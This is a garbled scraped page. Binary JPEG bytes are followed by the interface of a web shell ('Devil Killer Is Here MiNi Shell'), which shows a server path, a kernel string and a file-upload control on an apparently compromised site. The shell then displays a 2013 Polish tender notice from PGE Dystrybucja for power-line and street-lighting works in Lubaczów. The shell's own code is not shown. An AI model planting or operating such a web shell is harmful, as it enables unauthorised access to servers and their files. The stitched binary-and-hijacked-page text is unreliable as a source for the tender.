JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130329/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130329/126478-N-2013.html

<p class="kh_header"><b>Zamość: Przebudowa linii napowietrznej na kablową wraz z przyłączami, przebudowa i rozbudowa linii elektroenergetycznej 0,4 kV łącznie z oświetleniem ulicznym w m-ci Lubaczów I etap ul. Mickiewicza i Leśna.</b><br>
<b>Numer ogłoszenia: 126478 - 2013; data zamieszczenia: 29.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> PGE Dystrybucja Spółka Akcyjna ul. Garbarska 21A, 20-340 Lublin, Oddział Zamość , ul. Koźmiana 1, 22-400 Zamość, woj. lubelskie, tel. 84 539 21 00, faks 084 539 21 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zamosc.pgedystrybucja.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: sektor elektroenergetyczny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa linii napowietrznej na kablową wraz z przyłączami, przebudowa i rozbudowa linii elektroenergetycznej 0,4 kV łącznie z oświetleniem ulicznym w m-ci Lubaczów I etap ul. Mickiewicza i Leśna..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3. Opis przedmiotu zamówienia. 
3.1. Przedmiotem zamówienia, objętym niniejszym postępowaniem są roboty budowlane branży elektroenergetycznej -  Przebudowa linii napowietrznej na kablową wraz z przyłączami, przebudowa i rozbudowa linii elektroenergetycznej 0,4 kV łącznie z oświetleniem ulicznym w m-ci Lubaczów I etap ul. Mickiewicza i Leśna.
3.2. Oznaczenie przedmiotu zamówienia wg Wspólnego Słownika zamówień  (CPV): 
45231400-9  roboty w zakresie  budowy  linii  energetycznych
45232000 2 roboty pomocnicze w zakresie rurociągów i kabli
45232200 4  roboty pomocnicze  w zakresie linii energetycznych
45316110 9  instalowanie urządzeń oświetlenia drogowego
3.3. Zakres robót obejmuje: 
3.3.1. Zakres robót związany z przyłączeniem nowych odbiorców (finansowanie: PGE Dystrybucja S.A.):
a) Budowa linii kablowej nN obwód nr 1 na odcinku od istn. stacji Lubaczów 32 do proj. SK nr 32/01/07
b) Budowa linii kablowej nN obwód nr 2 na odcinku od istn. stacji Lubaczów 32 do proj. SK nr 32/02/05 i słupa linii napowietrznej nN nr 27/14.
c) Budowa linii kablowej nN obwód nr 3 na odcinku od istn. stacji Lubaczów 32 do proj. SK nr 32/03/02,
d) Budowa przyłączy kablowych YAKY-4x35mm2 do nowych odbiorców dz. nr 339 i 1188,
e) Budowa przyłączy kablowych YAKY-4x35mm2 do szaf oświetleniowych obwód 2 i 3
3.3.2. Zakres robót związany z odtworzeniem sieci (finansowanie: PGE Dystrybucja S.A.):
a) Przebudowa istniejących przyłączy napowietrznych na kablowe typu YAKY- 4x35mm2  oraz przełożenie istniejących przyłączy kablowych
b) Przebudowa istniejącej linii napowietrznej słupy nr 26/14 i 27/14,
c) Demontaż linii napowietrznej nN
3.3.3. Zakres robót związany z budową oświetlenia ulicznego (finansowanie: Gmina Miejska Lubaczów):
a) Budowa linii kablowej oświetlenia ulicznego YAKY 4x25mm2 ze stacji 15/04kV Lubaczów 32 
1 028 mb,
b) Montaż fundamentów słupów typu F-150/200 - 23 szt,
c) Ustawienie słupów oświetleniowych S90SRwP/4 - 23 szt,
d) Montaż opraw oświetleniowych Thorn Jet 2 100W HST/HIT-CE - 23 szt. wraz z lampami..
3.4. Szczegółowy zakres robót zawiera dokumentacja projektowa stanowiąca załączniki 
nr 9: a) i b) do niniejszej SIWZ oraz przedmiar robót stanowiący załącznik nr 8. 
3.5. Zakres zamówienia obejmuje również:
3.5.1. Zorganizowanie i zabezpieczenie placu budowy,
3.5.2. Przedłożenie wymaganych prawem świadectw bezpieczeństwa, certyfikatów i atestów na wbudowane materiały i urządzenia,
3.5.3. Wykonanie wytyczenia geodezyjnego i powykonawczej inwentaryzacji geodezyjnej,
3.5.4. Koszty dopuszczeń do pracy - wyłączenie napięcia, przygotowanie 
i likwidacja miejsca pracy, ponownego załączenia urządzeń (za koszty dopuszczeń do pracy Zamawiający wystawi Wykonawcy faktury zgodnie 
z taryfą),
3.5.5. Koszty pomiarów, badań, nadzorów, odbiorów z wyłączeniem odbiorów nadzorów, wykonywanych przez Zamawiającego,
3.5.6. Wypłatę odszkodowań za zniszczenia spowodowane przez Wykonawcę w trakcie wykonywania robót na posesjach właścicieli działek, na których będą wykonywane roboty, wraz z dostarczeniem oświadczenia Wykonawcy (reprezentacja jak w umowie) o zaspokojeniu wszystkich należności i roszczeń, wszystkich właścicieli nieruchomości związanych z budową i demontażem urządzeń elektroenergetycznych  objętych dokumentacja projektową,
3.5.7. Koszty transportu dostaw inwestorskich na plac budowy,
3.5.8. Dostarczenie materiałów z demontażu do magazynu Zamawiającego lub w miejsce przez niego wskazane,
3.5.9. Opracowanie projektu zajęcia pasa drogowego, wystąpienie o zajęcie pasa drogowego, wykonanie robót i oznakowania wynikające z zabezpieczenia pasa drogowego, opłaty za zajęcie pasa drogowego,
3.5.10. Wycinkę drzew i gałęzi,
3.5.11. Naprawę lub koszty naprawy uszkodzonych przez Wykonawcę w trakcie
wykonywania robót, dróg, chodników, ogrodzeń, mostków, urządzeń
melioracyjnych itp.,
3.5.12. Koszty wymaganych nadzorów specjalistycznych (konserwatorskich, archeologicznych, dendrologicznych itp.),
3.5.13. Koszty związane z zajęciem terenu PKP,
3.5.14. Koszty wynikające z konieczności budowy układów przejściowych i projektów zasilania tymczasowego,
3.5.15. Wykonawca powiadomi wszystkich Właścicieli gruntów o terminach wejścia na działkę celem wykonania robót,
3.5.16. Z uwagi na uwarunkowania Zamawiający wymaga szczególnie dokładnego zapoznania się z warunkami wykonania planowanych robót w miejscu ich przyszłej realizacji. W przypadku zastania stanu zagospodarowania innego niż w dacie wykonywania dokumentacji Wykonawca obowiązany jest uwzględnić w kosztach oferty wykonanie robót (przewierty lub przepychy pod nawierzchniami utwardzonymi lub rozebranie i odtworzenie nawierzchni) związanych ze spełnieniem wszystkich dodatkowych warunków właściciela terenu oraz  otrzymać od właściciela terenu potwierdzenie jakości wykonania tych robót wraz z okresem udzielonej gwarancji ,
3.5.17. Przed przystąpieniem do realizacji robót należy uzgodnić na roboczo 
z RE numerację urządzeń,
3.5.18. Teren po robotach należy doprowadzić do stanu poprzedniego, wymaganego przez właścicieli nieruchomości gruntowych.
3.5.19. Zamawiający wymaga wykonania prac z zachowaniem dopuszczalnego  maksymalnego czasu ograniczeń w dostawie energii elektrycznej dla odbiorców, który wynosi 24 godziny.
a) W przypadku przekroczenia czasu ograniczeń w dostawie energii dla odbiorców powyżej czasu wymienionego w ppkt.3.5.19., Zamawiający obciąży Wykonawcę kosztami z tytułu niedostarczonej energii,
b) Za przekroczenie dopuszczalnego czasu ograniczeń w dostawie energii dla odbiorców, wymienionego w ppkt.3.5.19, Zamawiający wystawi Wykonawcy notę obciążeniową na kwotę wyliczoną na podstawie poniższego wzoru:
Wuh = 0,4 x SNTr x T x CT x 10
Gdzie poszczególne symbole oznaczają:
Wuh - wartość obciążenia z tytułu niedostarczonej energii po przekroczeniu dopuszczalnego czasu wyłączeń dla realizowanego zadania.
SNTr - moc znamionowa wyłączonych transformatorów od chwili przekroczenia dopuszczalnych czasów wyłączeń [w kW] - przyjmując: 1 kVA=1kW (dla sieci nN przyjmuje się  równomierny podział mocy na poszczególne obwody). 
T - czas liczony od chwili przekroczenia dopuszczalnego czasu wyłączeń dla realizowanego zadania [w godzinach].
CT -  średnia cena energii elektrycznej o której mowa w  art. 23 ust. 2 pkt 18 lit. b) ustawy z dnia 10 kwietnia 1997 r.  - Prawo energetyczne
c) Zamawiający wymaga ścisłej koordynacji prac, terminów i czasów wyłączeń z właściwymi służbami RE (Centrum Dyspozytorskie i Wydział Utrzymania)
3.5.20. Inne czynności i koszty ich realizacji nie wymienione w ppkt. od 3.5.1. do 3.5.19. powyżej ale konieczne do wykonania przedmiotu zamówienia zgodnie 
z wiedzą i sztuką budowlaną, przepisami prawa oraz niniejszą SIWZ.
3.6. Zakres całości prac wynika z opisu przedmiotu zamówienia przedstawionego w pkt 3.1, 3.2, 3.3, 3.4, 3.5 niniejszej SIWZ oraz zapoznania się Wykonawcy z warunkami terenowymi, układem sieci, warunkami wyłączeń, odtworzenia terenu (dróg, chodników, zieleni itp.) w miejscu wykonania robót.
(Przez czynności i koszty oznaczone / należy rozumieć koszty/czynności, które należy uwzględnić w ofercie, tylko wtedy, gdy wynikają z postanowień ust 3.6. powyżej i przepisów prawa). 
3.7. Dostawy i roboty Zamawiającego:
3.7.1.  nie występują
UWAGA !
Zgodnie z Porozumieniem z dnia 28.02.2013 r. zawartym pomiędzy PGE Dystrybucja S.A., a Gminą Miejską Lubaczów za prace związane z budową i przebudową sieci elektroenergetycznej nN w miejscowości Lubaczów  (pkt. 3.3.1 i pkt. 3.3.2  SIWZ), oraz z budową oświetlenia ulicznego w m. Lubaczów  (pkt.3.3.3) niniejszej SIWZ strony będą ponosić koszty samodzielnie w oparciu o bezpośrednio zawarte umowy o realizację robót budowlanych z Wykonawcą robót tj.:
Za budowę i przebudowę sieci elektroenergetycznej nN w zakresie określonym w pkt. 3.3.1 i pkt. 3.3.2 niniejszej SIWZ - PGE Dystrybucja S.A..
Za linię kablową oświetlenia ulicznego w zakresie określonym w pkt. 3.3.3 niniejszej SIWZ - Gmina Miejska Lubaczów,
Koszty robót ziemnych na odcinkach wspólnych pokryje PGE Dystrybucja SA - 50% 
i Gmina Miejska Lubaczów - 50 %.
Koszt opracowania projektu organizacji ruchu i zajęcia pasa drogowego dla całości zadania  pokryją: PGE Dystrybucja SA - 50% i Gmina Miejska Lubaczów - 50 %.
Koszt obsługi geodezyjnej (wytyczenie i inwentaryzacja) dla całości zadania pokryją: PGE Dystrybucja SA - 80% i Gmina Miejska Lubaczów 20 %.
3.8. Dokumentacja projektowa jest do wglądu w siedzibie PGE Dystrybucja S.A. Oddział Zamość, adres: 22-400 Zamość ul. Koźmiana 1, pok. 206. 
3.9. Przedmiar robót w wersji elektronicznej umieszczony jest na stronie internetowej Zamawiającego:  www.zamosc.pgedystrybucja.pl  .
3.10. Zamawiający dopuszcza zastosowanie materiałów i urządzeń równoważnych
w stosunku do materiałów i urządzeń przewidzianych w opisie przedmiotu zamówienia
pod warunkiem, że oferent dołączy do oferty:
3.10.1. Dokumenty (świadectwa jakości, aprobaty, certyfikaty, metryki) urządzeń 
i materiałów przewidzianych w projekcie i równoważnych potwierdzających, że parametry techniczno-technologiczne oraz użytkowe proponowanych urządzeń 
i materiałów równoważnych są nie gorsze niż parametry techniczno-technologiczne oraz użytkowe urządzeń i materiałów przyjętych w projekcie,
3.10.2. Oświadczenia, że ewentualny projekt zamienny umożliwiający zastosowanie materiałów i urządzeń równoważnych zostanie opracowany w terminie 3 tygodni od daty podpisania umowy i uzgodniony w niezbędnym zakresie z projektantem (autorem dokumentacji, o której mowa w pkt 3.4) i instytucjami uzgadniającymi,
3.10.3. Oświadczenia, że wymagany termin zakończenia robót zostanie zachowany.
3.11. Gwarancja oraz rękojmia za wykonanie przedmiotu zamówienia wynosi 
36 miesięcy od dnia odbioru robót..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.14.00-9, 45.23.20.00-2, 45.23.22.00-4, 45.31.61.10-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wymagania dotyczące wadium.
1.1. Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie wadium 
w wysokości 7 000,00 zł (słownie: siedem tysięcy złotych 00/100).
1.2. Wadium może być wnoszone w jednej lub kilku następujących formach określonych
w art. 45 ust 6 Pzp tj. w:
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007  r Nr 42, poz.275 z późn. zm.)
1.3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto Oddziału Zamość 
Pekao S.A. 46 1240 2816 1111 0010 1245 2090. 
1.4. Wadium wnoszone w innej formie niż pieniądz należy złożyć w formie oryginału 
u Kierownika Wydziału Zamówień PGE Dystrybucja SA Oddział Zamość, Zamość ul. Koźmiana 1, pokój nr 215, od poniedziałku do piątku - z wyjątkiem świąt, w godzinach od 8:00 do 14:00 lub dołączyć do oferty.
1.5. Wadium musi być wniesione najpóźniej  do wyznaczonego terminu składania ofert tj. do dnia 12.04.2013 r. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się ono na rachunku bankowym Zamawiającego, 
o skuteczności nie decyduje data na poleceniu przelewu. Wadium w formie gwarancji lub poręczenia powinno zawierać zobowiązanie gwaranta o płatności nieodwołalnej, bezwarunkowej, płatnej na pierwsze żądanie.
1.6. Zwrot wadium nastąpi na zasadach określonych w art. 46 Pzp.
1.7. Zgodnie z art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych, Zamawiający zatrzyma wadium wraz z odsetkami, w przypadku gdy:
a) Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
b) Wykonawca, którego oferta została wybrana:
odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
nie wniesie wymaganego zabezpieczenia należytego wykonania umowy,
awarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie Wykonawcy. 
1.8. Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy Pzp, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymogów spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1.1. Posiadają wiedzę i doświadczenie do wykonania zamówienia tj. Wykażą się należytym wykonaniem, w ciągu ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, trzech robót budowlanych odpowiadających swoim rodzajem i wartością  robotom budowlanym stanowiącym przedmiot zamówienia,  z podaniem ich wartości, daty wykonania oraz Zamawiającego. 

Dokumenty żądane
1.2. Wykaz robót potwierdzający: należyte wykonanie, w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 3 robót budowlanych odpowiadających swoim rodzajem i wartością  robotom budowlanym stanowiącym przedmiot zamówienia z podaniem ich wartości, dat wykonania oraz Zamawiających. Wykaz należy sporządzić zgodnie ze wzorem Załącznik nr 5. 

Do wykazu należy dołączyć dokumenty potwierdzające, że roboty zostały wykonane należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone,

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymogów spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy, którzy:
1.1. Dysponują odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia tj. 
a) wykażą się co najmniej jedną osobą, którą dysponuje lub będzie dysponował Wykonawca i która będzie uczestniczyć w wykonywaniu zamówienia jako kierownik budowy, posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych i przynależnością do Okręgowej Izby Inżynierów Budownictwa oraz posiadającą ważne świadectwo kwalifikacyjne D i E powyżej 1 kV .
b) wykażą się co najmniej 2 osobami którymi dysponuje lub będzie dysponował Wykonawca, które będą uczestniczyć w wykonaniu zamówienia (oprócz kierownika budowy) i posiadają ważne świadectwa kwalifikacyjne uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci elektroenergetycznych powyżej 1 kV na stanowisku eksploatacji (grupa E), w tym jedna z tych osób posiada dodatkowe uprawnienia do wykonywania pomiarów.

Dokumenty żądane:
Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, potwierdzający: 
a) wykazanie się co najmniej jedną osobą, którą dysponuje lub będzie dysponował Wykonawca i która będzie uczestniczyć w wykonywaniu zamówienia jako kierownik budowy, posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, i przynależnością do Okręgowej Izby Inżynierów Budownictwa oraz posiadającą ważne świadectwo kwalifikacyjne D i E powyżej 1 kV, 
b) wykazanie się co najmniej 2 osobami, którymi dysponuje lub będzie dysponował Wykonawca, które będą uczestniczyć w wykonaniu zamówienia (oprócz kierownika budowy) i posiadają ważne świadectwa kwalifikacyjne uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci elektroenergetycznych powyżej 1 kV na stanowisku eksploatacji (grupa E), w tym jedna z tych osób posiada dodatkowe uprawnienia do wykonywania pomiarów. Wykaz należy sporządzić zgodnie ze wzorem Załącznika nr 6. 
Do Wykazu należy załączyć:
informację o podstawie do dysponowania wskazaną osobą /osobami,
oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają wymagane uprawnienia - wg Załącznika nr 7 do SIWZ .

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy, którzy:

1.1. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
zamówienia. Za spełnienie warunku Zamawiający uzna posiadanie ważnego i opłaconego ubezpieczenia  odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę co najmniej 1 000 000 zł (jeden milion złotych).

Dokumenty żądane:
1.2. Opłaconą polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę co najmniej 1 000 000 zł (jeden milion złotych).

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

